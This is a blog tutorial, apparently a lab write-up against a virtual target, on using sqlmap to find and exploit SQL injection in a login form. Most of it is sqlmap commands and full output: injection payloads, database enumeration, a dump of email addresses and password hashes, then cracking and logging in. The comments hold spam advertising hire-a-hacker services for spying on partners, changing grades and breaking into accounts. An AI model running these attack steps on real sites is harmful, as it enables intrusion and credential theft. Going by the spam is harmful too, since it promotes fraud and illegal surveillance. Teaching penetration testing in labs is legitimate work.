How To Dump Username And Password Using SQLMap Tool?
Table of Content
- What is sqlmap in Kali?
- Dump Username And Password Using SQLMap
What is sqlmap in Kali?
SQLMap is an open-source tool that is used to both identify and exploit SQL injection vulnerabilities. SQLMap contains many advanced features such as the ability to dump username and password from a remote website and bypass WAF (Web Application Firewall) etc.
Dump Username And Password Using Sqlmap
In this blog, We are going to Introduce about SQLMap tool, which is most popular. Using this tool we will dump username and password from the remote website.
Let’s begin. We have opened the login page of Europa Corp admin portal. Keep in mind that this is a virtual environment. Don’t try to attack this website.
Let’s put some random email and password. First, we will intercept this traffic using the burp suite tool that comes pre-installed in Kali Linux.
We have intercepted all traffic of Europa Corp admin portal website using the burp suite tool. Let’s copy all content and save it in sql.req file.
sql.req file looks like this. Let’s open it using the cat command, which comes pre-installed in Kali Linux.
Before using the sqlmap tool, keep in mind that this website uses HTTPS (Hypertext Transfer Protocol Secure). If you don’t add –force-ssl command with sqlmap tool, you can get an SSL error. At this time, we will retrieve the database name using –dbs command.
sqlmap -r sql.req --force-ssl --dbs
sqlmap -r sql.req --force-ssl --dbs
___
__H__
___ ___["]_____ ___ ___ {1.6.1.1#dev}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:59:46 /2022-01-16/
[23:59:46] [INFO] parsing HTTP request from 'sql.req'
[23:59:46] [INFO] resuming back-end DBMS 'mysql'
[23:59:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[23:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[23:59:48] [INFO] fetching database names
[23:59:48] [INFO] resumed: 'information_schema'
[23:59:48] [INFO] resumed: 'admin'
available databases [2]:
[*] admin
[*] information_schema
[23:59:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 23:59:48 /2022-01-16/
Our first mission completed successfully. We have got the database name of remote website using the above command. Let’s find out all tables inside admin database. I think you should follow the below command.
sqlmap -r sql.req --force-ssl -D admin --tables
sqlmap -r sql.req --force-ssl -D admin --tables
___
__H__
___ ___[)]_____ ___ ___ {1.6.1.1#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or da
mage caused by this program
[*] starting @ 00:03:09 /2022-01-17/
[00:03:09] [INFO] parsing HTTP request from 'sql.req'
[00:03:10] [INFO] resuming back-end DBMS 'mysql'
[00:03:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:03:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:03:11] [INFO] fetching tables for database: 'admin'
[00:03:11] [INFO] resumed: 'users'
Database: admin
[1 table]
+-------+
| users |
+-------+
[00:03:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 00:03:11 /2022-01-17/
We have got the table name inside the admin database using the above command. Let’s find out all columns inside users table.
sqlmap -r sql.req --force-ssl -D admin -T users --columns
sqlmap -r sql.req --force-ssl -D admin -T users --columns
___
__H__
___ ___[']_____ ___ ___ {1.6.1.1#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:05:52 /2022-01-17/
[00:05:52] [INFO] parsing HTTP request from 'sql.req'
[00:05:53] [INFO] resuming back-end DBMS 'mysql'
[00:05:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:05:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:05:54] [INFO] fetching columns for table 'users' in database 'admin'
[00:05:54] [INFO] resumed: 'id'
[00:05:54] [INFO] resumed: 'int(11)'
[00:05:54] [INFO] resumed: 'username'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'email'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'password'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'active'
[00:05:54] [INFO] resumed: 'tinyint(1)'
Database: admin
Table: users
[5 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| active | tinyint(1) |
| email | varchar(255) |
| id | int(11) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
[00:05:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 00:05:54 /2022-01-17/
We have got the column’s name inside the users table using the above command. Let’s dump email and password credentials. Following the below command.
sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump
sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump
___
__H__
___ ___[,]_____ ___ ___ {1.6.1.1#dev}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or da
mage caused by this program
[*] starting @ 00:08:33 /2022-01-17/
[00:08:33] [INFO] parsing HTTP request from 'sql.req'
[00:08:34] [INFO] resuming back-end DBMS 'mysql'
[00:08:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:08:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:08:36] [INFO] fetching entries of column(s) 'email,password' for table 'users' in database 'admin'
[00:08:38] [INFO] retrieved: '[email protected]'
[00:08:39] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[00:08:40] [INFO] retrieved: '[email protected]'
[00:08:42] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[00:08:42] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: admin
Table: users
[2 entries]
+----------------------+----------------------------------+
| email | password |
+----------------------+----------------------------------+
| [email protected] | 2b6d315337f18617ba18922c0b9597ff |
| [email protected] | 2b6d315337f18617ba18922c0b9597ff |
+----------------------+----------------------------------+
[00:08:46] [INFO] table 'admin.users' dumped to CSV file '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv'
[00:08:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 00:08:46 /2022-01-17/
Boom! We have got the email and password of the remote website, but the password is encrypted. In modern security, most websites store encrypted passwords inside the database. But I am lazy. To decrypt user hashes, we will use the dcode website.
Let’s put valid credentials inside the email and password field. After that, we got 302 redirections of the remote website.
Take a closer look at the below image.
Login Successful!!!!!
Recent Posts
- Protected: How To Mount USB Drive in Ubuntu Linux
- CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
- SQL INJECTION – Extracting Username and Password From Database
- How To Dump Username And Password Using SQLMap Tool?
- Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
Very Nice Blog Bro
hi…..
I got such a good information on this topic its very interesting one. You made a good site
hi…..
I got such a good information on this topic its very interesting one. You made a good site and I have found a similar website, please check this one Ethical Hacking Training visit the site to know more about cysecon.
The professional hacker true out the word that I believed in him is only Henryclarkethicalhacker Group Hackers Checked Google and see everybody comments on him he a professional that I believed in him if you have problems on any stuffed like a bank, company, school grades change examinations, database, Social media hacks, Email hacks, Phone hacks, Bitcoin hacks, increased Credit score boost to 800, School result upgrading, cryptocurrency, Binary option funds recovery, Bitcoin Mining, Instagram, WhatsApp, Twitter, Monitor your colleague, access your spouse social media, and a lot more, via, , on whatsapp 18134211326..
Contact him for any type of hacking, he is a professional hacker that specializes in exposing cheating spouses, and every other hacking related issues. he is a cyber guru, he helps catch cheating spouses by hacking their communications like call, Facebook, text, emails, Skype, whats-app and many more. I have used this service before and he did a very good job, he gave me every proof I needed to know that my fiancee was cheating. You can contact him on his email to help you catch your cheating spouse, or for any other hacking related problems, like hacking websites, bank statement, grades and many more. he will definitely help you, he has helped a lot of people, contact him on, , and you can Text/Call &WhatsApp: +1 (773)-609-2741, or +1201-430-5865, and figure out your relationship status. I wish you the best.
My girlfriend was very smart at hiding her infidelity from me due to some selfish reasons. So I had no proof for weeks while hurting myself during this process. Luckily I was referred to this private investigator and the result was awesome and top notch. All my girlfriend’s dirty chats, Facebook, WhatsApp, Instagram, and even phone conversations were directed to my cell phone, if your girlfriend, boyfriend, wife or husband are experts at hiding his or her cheating adventures, contact this fast and trusted link. You can reach them via, TEXT,Call & Whatsapp,+1(201)4305865, or +1(773)6092741…
A great hacker is really worthy of good recommendation , Henry
really help to get all the evidence i needed against my husband and
and i was able to confront him with this details from this great hacker
to get an amazing service done with the help ,he is good with what he does and the charges are affordable, I think all I owe him is publicity for a great work done via, , and you can text, call him on whatsapp him on +12014305865, or +17736092741,